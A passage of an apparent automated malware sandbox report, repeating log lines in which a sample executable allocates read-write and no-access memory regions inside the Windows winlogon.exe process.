Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CBFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE79000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE7B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE99000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE9B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEBB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CED9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEDB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEF9000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEFB000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF19000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF1B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF39000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF3B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF59000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF5B000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CF60000 protect: page read and writeJump to behavior
